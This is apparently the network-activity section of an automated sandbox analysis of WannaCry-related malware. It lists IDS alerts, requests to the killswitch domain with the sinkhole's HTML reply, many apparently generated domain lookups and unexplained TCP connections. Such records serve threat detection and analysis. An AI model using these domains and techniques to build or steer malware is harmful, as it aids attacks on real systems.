Source: Network traffic	Suricata IDS: 2024298 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 : 192.168.2.8:49710 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024301 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4 : 192.168.2.8:49711 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024299 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2 : 192.168.2.8:49710 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024301 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4 : 192.168.2.8:49710 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024302 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5 : 192.168.2.8:49711 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024302 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5 : 192.168.2.8:49710 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2024298 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 : 192.168.2.8:49704 -> 104.16.166.228:80
Source: Network traffic	Suricata IDS: 2024299 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2 : 192.168.2.8:49704 -> 104.16.166.228:80
Source: Network traffic	Suricata IDS: 2024301 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 4 : 192.168.2.8:49704 -> 104.16.166.228:80
Source: Network traffic	Suricata IDS: 2024302 - Severity 1 - ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 5 : 192.168.2.8:49704 -> 104.16.166.228:80
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.8:61724 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.8:63409 -> 1.1.1.1:53

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Tries to download HTTP data from a sinkholed server

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Jan 2025 15:57:16 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 90270f7f185d0f97-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Jan 2025 15:57:29 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 90270fd10f070cb2-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Jan 2025 15:57:29 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 90270fd19ef47cfc-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: oxuoxj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yuaame.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fofavv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pvjita.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aqziks.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uncjvy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uooqwj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kqpejd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: txsueo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoylnw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nfieuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ilo.brenz.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: wvonfn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ttilzo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ryiyek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ikebhe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fjlfoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hnwafy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oloroz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vwfafe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: itevsb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wiybwa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tiggay.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tcezwt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ncyyfy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oljrbm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bnnjpj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: whmeca.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eafaww.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: njbjte.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sgucuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wjaaae.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: azmakv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hycoja.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hiuznf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ogykld.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qxvfaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vssqzu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hsvhuy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oyewqz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rxtiio.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vgkebm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uulevy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bevtua.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oegiuo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: orvwjv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mhmasr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iyqdfh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pduhba.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uzgscj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: epejsq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ant.trenz.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: izgyem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cmyayw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sliweo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xfqora.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aguuxw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vixeeq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnezan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: akkujf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: veokda.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoauui.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: unclto.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imjmns.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ttedws.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nitrjr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: riyymn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jutqhm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: euieic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fsbczk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lnwfpg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zjaxax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: icvsob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iieiay.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qmfezv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gyinfa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ljomqy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wbqpcg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kyfjqk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nihrqy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yhnour.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aioade.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xwowqk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: scbors.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tvmcoy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bzmigs.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: evvbut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eahdry.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mpblhc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nfiyae.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ueohif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jbkunk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yntfrh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: loauaa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uuruou.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vdxuni.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sxsxzp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: afvqcy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ofulyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: snjiwm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jqjyrb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qxkaoo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fpzsfa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hrospx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yazpuo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: izacru.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yjumyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bitcaa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ukmeqc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mmazow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ytvutb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: csyyvl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ybdvhs.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ekfpve.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uxwoff.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chmtuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jseegc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jidduv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dwqzxj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: efegei.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pqrkoe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: favteu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rfiiyy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rtkhyx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shooys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ielyae.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nthzgn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jdbpht.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: onzpwq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dccqyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qycyhq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ylotge.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: luuymi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jyxidj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dkyyvp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ojnqpy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: veuibo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dwyvvs.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mgknby.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gnyoiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xeuyzh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xmkske.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uxumpp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uasnos.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vdxosv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tnwywt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eicsxp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ubumrx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ybcflo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iofiur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qovfco.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lnsrfu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xuuvfo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xkeubu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uxuxpl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ufpirp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kpxpnm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ueqfel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uayyyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tytzka.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qudqik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: audccc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qfqayo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: izyqkd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xdkgwd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mizeex.com replaycode: Name error (3)

Source: global traffic

TCP traffic: 192.168.2.8:61792 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

Source: Network traffic	Suricata IDS: 2024291 - Severity 1 - ET MALWARE Possible WannaCry DNS Lookup 1 : 192.168.2.8:63761 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2024291 - Severity 1 - ET MALWARE Possible WannaCry DNS Lookup 1 : 192.168.2.8:64182 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49711 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49704 -> 104.16.166.228:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49710 -> 104.16.167.228:80
Source: Network traffic	Suricata IDS: 2031515 - Severity 3 - ET MALWARE Known Sinkhole Response Kryptos Logic : 104.16.167.228:80 -> 192.168.2.8:49710
Source: Network traffic	Suricata IDS: 2031515 - Severity 3 - ET MALWARE Known Sinkhole Response Kryptos Logic : 104.16.166.228:80 -> 192.168.2.8:49704
Source: Network traffic	Suricata IDS: 2031515 - Severity 3 - ET MALWARE Known Sinkhole Response Kryptos Logic : 104.16.167.228:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.8:53292
Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.8:61145
Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.8:61597

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.69.43
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.4
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.4
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.4
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.4
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 203.228.45.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.16
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.16
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.16
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
